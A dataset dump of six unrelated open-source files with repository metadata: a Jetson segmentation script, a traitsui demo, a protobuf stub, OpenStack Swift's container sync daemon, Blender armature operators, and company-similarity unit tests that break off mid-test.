] |
permissive
|
corenel/jetson-inference
|
d6619d8a41992d090eb8271a319c78b11055c71d
|
d9c2fe77cdccdfcdcc238bbd622b1222906804b1
|
refs/heads/master
| 2020-09-26T03:35:32.817777
| 2019-12-05T18:09:57
| 2019-12-05T18:09:57
| 226,155,474
| 1
| 0
|
NOASSERTION
| 2019-12-05T17:33:14
| 2019-12-05T17:33:13
| null |
UTF-8
|
Python
| false
| false
| 3,395
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import jetson.inference
import jetson.utils
import argparse
import ctypes
import sys
# parse the command line
parser = argparse.ArgumentParser(description="Segment an image using a semantic segmentation DNN.",
formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.segNet.Usage())
parser.add_argument("file_in", type=str, help="filename of the input image to process")
parser.add_argument("file_out", type=str, default=None, nargs='?', help="filename of the output image to save")
parser.add_argument("--network", type=str, default="fcn-resnet18-voc", help="pre-trained model to load, see below for options")
parser.add_argument("--visualize", type=str, default="overlay", choices=["overlay", "mask"], help="visualization mode for the output image, options are:\n 'overlay' or 'mask' (default: 'overlay')")
parser.add_argument("--filter-mode", type=str, default="linear", choices=["point", "linear"], help="filtering mode used during visualization, options are:\n 'point' or 'linear' (default: 'linear')")
parser.add_argument("--ignore-class", type=str, default="void", help="optional name of class to ignore in the visualization results (default: 'void')")
parser.add_argument("--alpha", type=float, default=120.0, help="alpha blending value to use during overlay, between 0.0 and 255.0 (default: 120.0)")
try:
opt = parser.parse_known_args()[0]
except:
print("")
parser.print_help()
sys.exit(0)
# load an image (into shared CPU/GPU memory)
img, width, height = jetson.utils.loadImageRGBA(opt.file_in)
# allocate the output image for the overlay/mask
img_output = jetson.utils.cudaAllocMapped(width * height * 4 * ctypes.sizeof(ctypes.c_float))
# load the segmentation network
net = jetson.inference.segNet(opt.network, sys.argv)
# process the segmentation network
net.Process(img, width, height, opt.ignore_class)
# print out timing info
net.PrintProfilerTimes()
# perform the visualization
if opt.file_out is not None:
if opt.visualize == 'overlay':
net.Overlay(img_output, width, height, opt.filter_mode)
elif opt.visualize == 'mask':
net.Mask(img_output, width, height, opt.filter_mode)
jetson.utils.cudaDeviceSynchronize()
jetson.utils.saveImageRGBA(opt.file_out, img_output, width, height)
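# Example invocation (illustrative only; the image filenames are hypothetical and the
# default fcn-resnet18-voc model is assumed to be available locally):
#
#   $ python segnet-console.py input.jpg output.jpg --network=fcn-resnet18-voc \
#       --visualize=overlay --filter-mode=linear --alpha=120.0
#
# Passing --visualize=mask writes the colorized class mask instead of the blended overlay.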
|
[
"dustinf@nvidia.com"
] |
dustinf@nvidia.com
|
d29aaf4a31d5306834e221f9ebd7c2bd3ba9ca04
|
6a7563ad479e2c3d497d62e91f418d245ec658df
|
/scratch/andrei_surf.py
|
9dc279524c57ecc39c16fe9df14dcfb005e551ce
|
[] |
no_license
|
rosoba/rosoba
|
979901ab4858c1559e7ae9c214fb60ca71eec9b5
|
b26ae5b6b0f9b7027f306af7da9d1aff1c3e2a46
|
refs/heads/master
| 2021-01-19T18:36:04.107879
| 2016-01-20T09:48:48
| 2016-01-20T09:48:48
| 4,391,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,163
|
py
|
'''
Created on Oct 29, 2014
@author: rch
'''
# Copyright (c) 2007, Enthought, Inc.
# License: BSD Style.# Imports:
from traits.api \
import HasTraits, Trait, Range
from traitsui.api \
import Item, Group, View
# Define the demo class:
class CompoundEditorDemo (HasTraits):
""" Defines the main CompoundEditor demo class.
"""
    # Define a compound trait to view:
compound_trait = Trait(1, Range(1, 6), 'a', 'b', 'c', 'd', 'e', 'f')
# Display specification (one Item per editor style):
comp_group = Group(
Item('compound_trait', style='simple', label='Simple'),
Item('_'),
Item('compound_trait', style='custom', label='Custom'),
Item('_'),
Item('compound_trait', style='text', label='Text'),
Item('_'),
Item('compound_trait', style='readonly', label='ReadOnly')
)
# Demo view:
view = View(
comp_group,
title='CompoundEditor',
buttons=['OK'],
resizable=True
)
# Create the demo:
demo = CompoundEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
demo.configure_traits()
|
[
"rostislav.chudoba@rwth-aachen.de"
] |
rostislav.chudoba@rwth-aachen.de
|
8d93f9ccfd2e6df3d1370888cc758aae9f78d8f9
|
bc441bb06b8948288f110af63feda4e798f30225
|
/console_gateway_sdk/model/inspection/collector_pb2.pyi
|
d3de42f7e2fc90213ed9384b7ba9194cefd9596f
|
[
"Apache-2.0"
] |
permissive
|
easyopsapis/easyops-api-python
|
23204f8846a332c30f5f3ff627bf220940137b6b
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
refs/heads/master
| 2020-06-26T23:38:27.308803
| 2020-06-16T07:25:41
| 2020-06-16T07:25:41
| 199,773,131
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,516
|
pyi
|
# @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from console_gateway_sdk.model.inspection.arg_pb2 import (
InspectionArg as console_gateway_sdk___model___inspection___arg_pb2___InspectionArg,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class InspectionCollector(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
id = ... # type: typing___Text
name = ... # type: typing___Text
content = ... # type: typing___Text
script = ... # type: typing___Text
@property
def args(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[console_gateway_sdk___model___inspection___arg_pb2___InspectionArg]: ...
def __init__(self,
*,
id : typing___Optional[typing___Text] = None,
name : typing___Optional[typing___Text] = None,
content : typing___Optional[typing___Text] = None,
script : typing___Optional[typing___Text] = None,
args : typing___Optional[typing___Iterable[console_gateway_sdk___model___inspection___arg_pb2___InspectionArg]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> InspectionCollector: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> InspectionCollector: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"args",b"args",u"content",b"content",u"id",b"id",u"name",b"name",u"script",b"script"]) -> None: ...
|
[
"service@easyops.cn"
] |
service@easyops.cn
|
bd731b54b3f34a5f9c78bc5a8c9a5b2f0e2e69ba
|
71ff08cd801bbedc0902af096e8c4630f4747f4b
|
/container/sync.py
|
0a3d0209e830b73bc83c496bb14d2a8663d363e5
|
[] |
no_license
|
Prosunjit/Swift
|
9b631b2a90ae10f1b24087a39fb2f322248387c5
|
4bb1319194e0be26bf62c95d004c450be4a05b82
|
refs/heads/master
| 2021-01-10T20:25:35.588770
| 2014-10-25T17:01:37
| 2014-10-25T17:01:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,829
|
py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
from swift import gettext_ as _
from time import ctime, time
from random import choice, random, shuffle
from struct import unpack_from
from eventlet import sleep, Timeout
import swift.common.db
from swift.container.backend import ContainerBroker, DATADIR
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.direct_client import direct_get_object
from swift.common.internal_client import delete_object, put_object
from swift.common.exceptions import ClientException
from swift.common.ring import Ring
from swift.common.utils import (
audit_location_generator, clean_content_type, config_true_value,
FileLikeIter, get_logger, hash_path, quote, urlparse, validate_sync_to,
whataremyips)
from swift.common.daemon import Daemon
from swift.common.http import HTTP_UNAUTHORIZED, HTTP_NOT_FOUND
class ContainerSync(Daemon):
"""
Daemon to sync syncable containers.
This is done by scanning the local devices for container databases and
checking for x-container-sync-to and x-container-sync-key metadata values.
If they exist, newer rows since the last sync will trigger PUTs or DELETEs
to the other container.
.. note::
Container sync will sync object POSTs only if the proxy server is set
to use "object_post_as_copy = true" which is the default. So-called
fast object posts, "object_post_as_copy = false" do not update the
container listings and therefore can't be detected for synchronization.
The actual syncing is slightly more complicated to make use of the three
(or number-of-replicas) main nodes for a container without each trying to
do the exact same work but also without missing work if one node happens to
be down.
Two sync points are kept per container database. All rows between the two
sync points trigger updates. Any rows newer than both sync points cause
updates depending on the node's position for the container (primary nodes
do one third, etc. depending on the replica count of course). After a sync
run, the first sync point is set to the newest ROWID known and the second
sync point is set to newest ROWID for which all updates have been sent.
An example may help. Assume replica count is 3 and perfectly matching
ROWIDs starting at 1.
First sync run, database has 6 rows:
* SyncPoint1 starts as -1.
* SyncPoint2 starts as -1.
* No rows between points, so no "all updates" rows.
* Six rows newer than SyncPoint1, so a third of the rows are sent
by node 1, another third by node 2, remaining third by node 3.
* SyncPoint1 is set as 6 (the newest ROWID known).
* SyncPoint2 is left as -1 since no "all updates" rows were synced.
Next sync run, database has 12 rows:
* SyncPoint1 starts as 6.
* SyncPoint2 starts as -1.
* The rows between -1 and 6 all trigger updates (most of which
should short-circuit on the remote end as having already been
done).
* Six more rows newer than SyncPoint1, so a third of the rows are
sent by node 1, another third by node 2, remaining third by node
3.
* SyncPoint1 is set as 12 (the newest ROWID known).
* SyncPoint2 is set as 6 (the newest "all updates" ROWID).
In this way, under normal circumstances each node sends its share of
updates each run and just sends a batch of older updates to ensure nothing
was missed.
:param conf: The dict of configuration values from the [container-sync]
section of the container-server.conf
:param container_ring: If None, the <swift_dir>/container.ring.gz will be
loaded. This is overridden by unit tests.
:param object_ring: If None, the <swift_dir>/object.ring.gz will be loaded.
This is overridden by unit tests.
"""
def __init__(self, conf, container_ring=None, object_ring=None):
#: The dict of configuration values from the [container-sync] section
#: of the container-server.conf.
self.conf = conf
#: Logger to use for container-sync log lines.
self.logger = get_logger(conf, log_route='container-sync')
#: Path to the local device mount points.
self.devices = conf.get('devices', '/srv/node')
#: Indicates whether mount points should be verified as actual mount
#: points (normally true, false for tests and SAIO).
self.mount_check = config_true_value(conf.get('mount_check', 'true'))
#: Minimum time between full scans. This is to keep the daemon from
#: running wild on near empty systems.
self.interval = int(conf.get('interval', 300))
#: Maximum amount of time to spend syncing a container before moving on
        #: to the next one. If a container sync hasn't finished in this time,
#: it'll just be resumed next scan.
self.container_time = int(conf.get('container_time', 60))
#: ContainerSyncCluster instance for validating sync-to values.
self.realms_conf = ContainerSyncRealms(
os.path.join(
conf.get('swift_dir', '/etc/swift'),
'container-sync-realms.conf'),
self.logger)
#: The list of hosts we're allowed to send syncs to. This can be
#: overridden by data in self.realms_conf
self.allowed_sync_hosts = [
h.strip()
for h in conf.get('allowed_sync_hosts', '127.0.0.1').split(',')
if h.strip()]
self.http_proxies = [
a.strip()
for a in conf.get('sync_proxy', '').split(',')
if a.strip()]
#: Number of containers with sync turned on that were successfully
#: synced.
self.container_syncs = 0
#: Number of successful DELETEs triggered.
self.container_deletes = 0
#: Number of successful PUTs triggered.
self.container_puts = 0
#: Number of containers that didn't have sync turned on.
self.container_skips = 0
#: Number of containers that had a failure of some type.
self.container_failures = 0
#: Time of last stats report.
self.reported = time()
swift_dir = conf.get('swift_dir', '/etc/swift')
#: swift.common.ring.Ring for locating containers.
self.container_ring = container_ring or Ring(swift_dir,
ring_name='container')
#: swift.common.ring.Ring for locating objects.
self.object_ring = object_ring or Ring(swift_dir, ring_name='object')
self._myips = whataremyips()
self._myport = int(conf.get('bind_port', 6001))
swift.common.db.DB_PREALLOCATION = \
config_true_value(conf.get('db_preallocation', 'f'))
def run_forever(self, *args, **kwargs):
"""
Runs container sync scans until stopped.
"""
sleep(random() * self.interval)
while True:
begin = time()
all_locs = audit_location_generator(self.devices, DATADIR, '.db',
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.container_sync(path)
if time() - self.reported >= 3600: # once an hour
self.report()
elapsed = time() - begin
if elapsed < self.interval:
sleep(self.interval - elapsed)
def run_once(self, *args, **kwargs):
"""
Runs a single container sync scan.
"""
self.logger.info(_('Begin container sync "once" mode'))
begin = time()
all_locs = audit_location_generator(self.devices, DATADIR, '.db',
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.container_sync(path)
if time() - self.reported >= 3600: # once an hour
self.report()
self.report()
elapsed = time() - begin
self.logger.info(
_('Container sync "once" mode completed: %.02fs'), elapsed)
def report(self):
"""
Writes a report of the stats to the logger and resets the stats for the
next report.
"""
self.logger.info(
_('Since %(time)s: %(sync)s synced [%(delete)s deletes, %(put)s '
'puts], %(skip)s skipped, %(fail)s failed'),
{'time': ctime(self.reported),
'sync': self.container_syncs,
'delete': self.container_deletes,
'put': self.container_puts,
'skip': self.container_skips,
'fail': self.container_failures})
self.reported = time()
self.container_syncs = 0
self.container_deletes = 0
self.container_puts = 0
self.container_skips = 0
self.container_failures = 0
def container_sync(self, path):
"""
Checks the given path for a container database, determines if syncing
is turned on for that database and, if so, sends any updates to the
other container.
:param path: the path to a container db
"""
broker = None
try:
broker = ContainerBroker(path)
info = broker.get_info()
x, nodes = self.container_ring.get_nodes(info['account'],
info['container'])
for ordinal, node in enumerate(nodes):
if node['ip'] in self._myips and node['port'] == self._myport:
break
else:
return
if not broker.is_deleted():
sync_to = None
user_key = None
sync_point1 = info['x_container_sync_point1']
sync_point2 = info['x_container_sync_point2']
for key, (value, timestamp) in broker.metadata.iteritems():
if key.lower() == 'x-container-sync-to':
sync_to = value
elif key.lower() == 'x-container-sync-key':
user_key = value
if not sync_to or not user_key:
self.container_skips += 1
self.logger.increment('skips')
return
err, sync_to, realm, realm_key = validate_sync_to(
sync_to, self.allowed_sync_hosts, self.realms_conf)
if err:
self.logger.info(
_('ERROR %(db_file)s: %(validate_sync_to_err)s'),
{'db_file': str(broker),
'validate_sync_to_err': err})
self.container_failures += 1
self.logger.increment('failures')
return
stop_at = time() + self.container_time
next_sync_point = None
while time() < stop_at and sync_point2 < sync_point1:
rows = broker.get_items_since(sync_point2, 1)
if not rows:
break
row = rows[0]
if row['ROWID'] > sync_point1:
break
key = hash_path(info['account'], info['container'],
row['name'], raw_digest=True)
# This node will only initially sync out one third of the
# objects (if 3 replicas, 1/4 if 4, etc.) and will skip
# problematic rows as needed in case of faults.
# This section will attempt to sync previously skipped
# rows in case the previous attempts by any of the nodes
# didn't succeed.
if not self.container_sync_row(
row, sync_to, user_key, broker, info, realm,
realm_key):
if not next_sync_point:
next_sync_point = sync_point2
sync_point2 = row['ROWID']
broker.set_x_container_sync_points(None, sync_point2)
if next_sync_point:
broker.set_x_container_sync_points(None, next_sync_point)
while time() < stop_at:
rows = broker.get_items_since(sync_point1, 1)
if not rows:
break
row = rows[0]
key = hash_path(info['account'], info['container'],
row['name'], raw_digest=True)
# This node will only initially sync out one third of the
# objects (if 3 replicas, 1/4 if 4, etc.). It'll come back
# around to the section above and attempt to sync
# previously skipped rows in case the other nodes didn't
# succeed or in case it failed to do so the first time.
if unpack_from('>I', key)[0] % \
len(nodes) == ordinal:
self.container_sync_row(
row, sync_to, user_key, broker, info, realm,
realm_key)
sync_point1 = row['ROWID']
broker.set_x_container_sync_points(sync_point1, None)
self.container_syncs += 1
self.logger.increment('syncs')
except (Exception, Timeout) as err:
self.container_failures += 1
self.logger.increment('failures')
self.logger.exception(_('ERROR Syncing %s'),
broker if broker else path)
def container_sync_row(self, row, sync_to, user_key, broker, info,
realm, realm_key):
"""
Sends the update the row indicates to the sync_to container.
:param row: The updated row in the local database triggering the sync
update.
:param sync_to: The URL to the remote container.
:param user_key: The X-Container-Sync-Key to use when sending requests
to the other container.
:param broker: The local container database broker.
:param info: The get_info result from the local container database
broker.
:param realm: The realm from self.realms_conf, if there is one.
If None, fallback to using the older allowed_sync_hosts
way of syncing.
:param realm_key: The realm key from self.realms_conf, if there
is one. If None, fallback to using the older
allowed_sync_hosts way of syncing.
:returns: True on success
"""
try:
start_time = time()
if row['deleted']:
try:
headers = {'x-timestamp': row['created_at']}
if realm and realm_key:
nonce = uuid.uuid4().hex
path = urlparse(sync_to).path + '/' + quote(
row['name'])
sig = self.realms_conf.get_sig(
'DELETE', path, headers['x-timestamp'], nonce,
realm_key, user_key)
headers['x-container-sync-auth'] = '%s %s %s' % (
realm, nonce, sig)
else:
headers['x-container-sync-key'] = user_key
delete_object(sync_to, name=row['name'], headers=headers,
proxy=self.select_http_proxy(),
logger=self.logger)
except ClientException as err:
if err.http_status != HTTP_NOT_FOUND:
raise
self.container_deletes += 1
self.logger.increment('deletes')
self.logger.timing_since('deletes.timing', start_time)
else:
part, nodes = self.object_ring.get_nodes(
info['account'], info['container'],
row['name'])
shuffle(nodes)
exc = None
looking_for_timestamp = float(row['created_at'])
timestamp = -1
headers = body = None
for node in nodes:
try:
these_headers, this_body = direct_get_object(
node, part, info['account'], info['container'],
row['name'], resp_chunk_size=65536)
this_timestamp = float(these_headers['x-timestamp'])
if this_timestamp > timestamp:
timestamp = this_timestamp
headers = these_headers
body = this_body
except ClientException as err:
# If any errors are not 404, make sure we report the
# non-404 one. We don't want to mistakenly assume the
# object no longer exists just because one says so and
# the others errored for some other reason.
if not exc or getattr(
exc, 'http_status', HTTP_NOT_FOUND) == \
HTTP_NOT_FOUND:
exc = err
except (Exception, Timeout) as err:
exc = err
if timestamp < looking_for_timestamp:
if exc:
raise exc
raise Exception(
_('Unknown exception trying to GET: %(node)r '
'%(account)r %(container)r %(object)r'),
{'node': node, 'part': part,
'account': info['account'],
'container': info['container'],
'object': row['name']})
for key in ('date', 'last-modified'):
if key in headers:
del headers[key]
if 'etag' in headers:
headers['etag'] = headers['etag'].strip('"')
if 'content-type' in headers:
headers['content-type'] = clean_content_type(
headers['content-type'])
headers['x-timestamp'] = row['created_at']
if realm and realm_key:
nonce = uuid.uuid4().hex
path = urlparse(sync_to).path + '/' + quote(row['name'])
sig = self.realms_conf.get_sig(
'PUT', path, headers['x-timestamp'], nonce, realm_key,
user_key)
headers['x-container-sync-auth'] = '%s %s %s' % (
realm, nonce, sig)
else:
headers['x-container-sync-key'] = user_key
put_object(sync_to, name=row['name'], headers=headers,
contents=FileLikeIter(body),
proxy=self.select_http_proxy(), logger=self.logger)
self.container_puts += 1
self.logger.increment('puts')
self.logger.timing_since('puts.timing', start_time)
except ClientException as err:
if err.http_status == HTTP_UNAUTHORIZED:
self.logger.info(
_('Unauth %(sync_from)r => %(sync_to)r'),
{'sync_from': '%s/%s' %
(quote(info['account']), quote(info['container'])),
'sync_to': sync_to})
elif err.http_status == HTTP_NOT_FOUND:
self.logger.info(
_('Not found %(sync_from)r => %(sync_to)r \
- object %(obj_name)r'),
{'sync_from': '%s/%s' %
(quote(info['account']), quote(info['container'])),
'sync_to': sync_to, 'obj_name': row['name']})
else:
self.logger.exception(
_('ERROR Syncing %(db_file)s %(row)s'),
{'db_file': str(broker), 'row': row})
self.container_failures += 1
self.logger.increment('failures')
return False
except (Exception, Timeout) as err:
self.logger.exception(
_('ERROR Syncing %(db_file)s %(row)s'),
{'db_file': str(broker), 'row': row})
self.container_failures += 1
self.logger.increment('failures')
return False
return True
def select_http_proxy(self):
return choice(self.http_proxies) if self.http_proxies else None
|
[
"prosun.csedu@gmail.com"
] |
prosun.csedu@gmail.com
|
2b22e7941f98947b5b972f54f67d8ed480df2bfa
|
1bfb0e3a59cac249827123e1b8bef5bfd72ed4e8
|
/bindpose_utils.py
|
2c9804b381cfe1ad66c67275c58d52a512af6e4b
|
[] |
no_license
|
jeacom25b/Armature_snippets
|
e12b0a798da6e7a59432e0517bdaa6b964ab924c
|
44c37c40fb430e5a36457a66e5c697331053ded6
|
refs/heads/master
| 2021-01-23T17:35:49.085626
| 2017-09-14T12:44:08
| 2017-09-14T12:44:08
| 102,768,115
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,902
|
py
|
import bpy
from mathutils import Vector
import math
class ResetStretch(bpy.types.Operator):
bl_idname = "armature_snippets.reset_stretch"
bl_label = "Reset stretch"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "STRETCH_TO":
constraint = bone.constraints[index]
c = context.copy()
c["constraint"] = constraint
ob.data.bones.active = bone.bone
bpy.ops.constraint.stretchto_reset(c, constraint = constraint.name, owner = "BONE")
ob.data.bones.active = last_active_bone
return {"FINISHED"}
class ResetLimdist(bpy.types.Operator):
bl_idname = "armature_snippets.reset_limitdistance"
bl_label = "Reset limit distance"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "LIMIT_DISTANCE":
constraint = bone.constraints[index]
c = context.copy()
c["constraint"] = constraint
ob.data.bones.active = bone.bone
bpy.ops.constraint.limitdistance_reset(c, constraint = constraint.name, owner = "BONE")
ob.data.bones.active = last_active_bone
return {"FINISHED"}
# context is the bpy.context,
# p_bone is the pose bone with the constraint
# ik is the Inverse kinimatics constraint on the p_bone
# angle is the angle to try and score
def ik_test(context, p_bone, ik, angle):
# mute constraint for getting original vectors of the bone
ik.mute = True
# then update the scene
context.scene.frame_set(context.scene.frame_current)
    # get some vectors
v1 = p_bone.vector.copy()
x1 = p_bone.x_axis.copy()
z1 = p_bone.z_axis.copy()
# unmute the constraint
ik.mute = False
# set the pole_angle for the test
ik.pole_angle = angle
# update the scene again
context.scene.frame_set(context.scene.frame_current)
# get the new vectors
v2 = p_bone.vector.copy()
x2 = p_bone.x_axis.copy()
z2 = p_bone.z_axis.copy()
    # let's see the differences..
v_point = (v1 - v2).magnitude
x_point = (x1 - x2).magnitude
z_point = (z1 - z2).magnitude
    # let's get the total score
total = v_point + x_point + z_point
    # with a better score the total should be smaller,
    # but it returns zero at multiple angles;
    # this can only happen if the scene doesn't update.
print(angle, total)
return (angle, total)
# a simple lerp function
def lerp(x, y, c):
a = x * (1 - c)
b = y * c
return a + b
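# Illustrative note (added for clarity): FindIkPole below samples eleven candidate
# pole angles by lerping between -180 and 180, i.e.
#   [lerp(-180, 180, i / 10) for i in range(11)]  ->  [-180.0, -144.0, ..., 144.0, 180.0]
# and scores each candidate with ik_test(); a smaller total means the bone moved less.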
class FindIkPole(bpy.types.Operator):
bl_idname = "armature_snippets.find_ik_pole_angle"
bl_label = "Find IK pole Angle"
bl_description = ""
bl_options = {"REGISTER", "UNDO"}
@classmethod
def poll(cls, context):
if context.active_object:
return context.active_object.mode == "POSE"
def execute(self, context):
ob = context.active_object
bones = context.selected_pose_bones
last_active_bone = ob.data.bones.active
for bone in bones:
c_type_list = [c.type for c in bone.constraints]
for index, type in enumerate(c_type_list):
if type == "IK":
ik = bone.constraints[index]
if not ik.mute:
n1 = -180
n2 = 180
tests = []
for i in range(11):
c = i / 10
angle = lerp(n1, n2, c)
tests.append(ik_test(context, bone, ik, angle))
print(tests)
ob.data.bones.active = last_active_bone
return {"FINISHED"}
|
[
"noreply@github.com"
] |
jeacom25b.noreply@github.com
|
834025c62b2d1817c220a98e1ff02a019d8fc277
|
a175a13680f28ceef3db31c155984a773d2bad32
|
/companysim/tests.py
|
81f332e116e48d1ae093b4472a2b902e76396bf0
|
[] |
no_license
|
meeranmismail/CS341-Startup-Similarity
|
e2d1a405ec69389bcfe7a3ecb4c320183e6ef4f4
|
0552fe6ce5e825711d710c5d3a731c081ae9cfe5
|
refs/heads/master
| 2021-01-19T09:18:46.527076
| 2018-07-02T21:11:41
| 2018-07-02T21:11:41
| 87,747,270
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,724
|
py
|
import unittest
import numpy as np
import pandas as pd
from companysim import CompanyCorpus, CompanyGraph
class TestCompanyCorpus(unittest.TestCase):
# ======== Start of tests for CompanyCorpus class
    # Test that the _build_corpus function assigns the internal corpus correctly
def test_build_corpus_from_ndarray(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
self.assertTrue(isinstance(cc.corpus, pd.DataFrame))
# Test that _build_corpus correctly checks for the right type
def test_build_corpus_type_error(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
self.assertRaises(TypeError, CompanyCorpus, test_corpus)
    # Test the option to provide a pre-built idf vector at object creation
def test_idf_vector_pre_built(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
test_idf = [np.log((1 + 1) / (1 + 1)), np.log((1 + 2) / (1 + 1)), np.log((1 + 2) / (1 + 1))]
test_terms = ['provider', 'software', 'hardware']
test_input_idf = pd.Series(test_idf, index=test_terms)
cc = CompanyCorpus(test_input, idf=test_input_idf)
self.assertIsInstance(cc.idf_vector, pd.Series)
    # Test that the build_idf function calculates the idf correctly and sets it as the internal value
def test_idf_vector_creation(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
desired_output = [np.log((1 + 1) / (1 + 1)), np.log((1 + 2) / (1 + 1)), np.log((1 + 2) / (1 + 1))]
cc = CompanyCorpus(test_input)
idf_vec, term_vector = cc.build_idf(description_column_name='description')
self.assertTrue(all(val in idf_vec for val in desired_output))
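    # Note (added for clarity): the expected values above are consistent with a
    # smoothed idf of the form idf(t) = log((1 + N) / (1 + df(t))) over N = 2
    # documents, so 'provider' (df = 2) scores log(1) = 0 while 'software' and
    # 'hardware' (df = 1) score log(3 / 2).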
def test_filter_description_by_idf(self):
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 2
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
desired_output = [{'software'}, {'hardware'}]
self.assertTrue(all(word in cc.corpus['rare_words'].values for word in desired_output))
# ======== Start of tests for CompanyGraph class
def test_build_lsh_forest(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance and test building the LSH forest
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
self.assertTrue(cg.lsh_forest)
def test_build_graph(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware'],
['company_3', 'Provider of Software technology']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=3)
self.assertIsNotNone(cg.graph)
def test_get_dot_product_score(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware technology'],
['company_3', 'Provider of Software technology'], ['company_4', 'Provider of software service']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
